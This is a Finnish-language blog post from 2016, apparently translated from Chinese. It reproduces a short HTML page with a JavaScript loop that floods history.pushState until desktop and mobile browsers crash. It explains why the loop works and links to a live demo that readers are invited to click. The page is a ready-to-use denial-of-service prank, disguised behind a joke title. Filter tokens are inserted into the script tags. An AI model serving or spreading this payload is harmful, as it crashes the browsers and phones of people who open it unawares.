|
|
Julkaistu 22.1.2016 11.36.39
|
|
|
|
Tapahtuman syynä on tämä: ulkomaalainen ystävä Cyber Security julkaisi Twitterissä seuraavan twiitin:
Tämä tyyppi väittää, että jos käytät yllä olevaa 12-rivistä Javascrip{filter}t-koodia, voit kaatua Firefox-, Chrome- ja Safari-selaimet sekä saada iPhonesi käynnistymään uudelleen ja Android-puhelimen kaatumaan!
Koko HTML-koodi on seuraava:
- <html>
- <head>
- <meta charset="utf-8">
- <title>谁点谁怀孕</title>
- </head>
- <body>
- 恭喜你,你已经怀孕了!
- <scrip{过滤}t>
- var total="";
- for (var i=0;i<1000000;i++)
- {
- total= total+i.toString();
- history.pushState(0,0,total);
- }
- </scrip{过滤}t>
- </body>
- </html>
Jos olet PC-käyttäjä, klikkaamalla linkkiä, tietokoneen suorittimen muisti todennäköisesti kasvaa koko ajan, kunnes selain kaatuu ja jumittuu...
Jos käytät mobiilia (Android, iPhone), selaimesi kaatuu linkin klikkauksen jälkeen! Linkin klikkaaminen Weibossa ja WeChatissa kaatuu myös.
Miksi näin tapahtuu? Tässä yhteydessä löysin vastauksen jumalalta nimeltä "Xiaomi" Zhihulta:
history.pushstate() on HTML5:n esittelemä API, pushState lisää määritellyn URL-osoitteen selaushistoriaan ja tallentaa nykyisen historiapisteen. Kun i<100000, kokonaissumma tallennetaan selaushistoriaan syklisesti, ja jos sitä toistetaan liikaa, selain ei kestä sitä ja kaatuu luonnollisesti.
No, joka tapauksessa, en osaa edes keksiä "hei maailma", joten en ymmärrä sitä ollenkaan... Lyhyesti sanottuna, on juuri sopivaa räjäyttää taivas!
Jos haluat kokeilla, klikkaa tästä: http://www.itsvse.com/demo.html
|
Edellinen:[avoin lähdekoodi] Wooyunin haavoittuvuuskysely Alustan lähdekoodi plus tietokanta asp.net versioSeuraava:Linux config/configure/Configure, make, make test/make check, sudo make in...
|
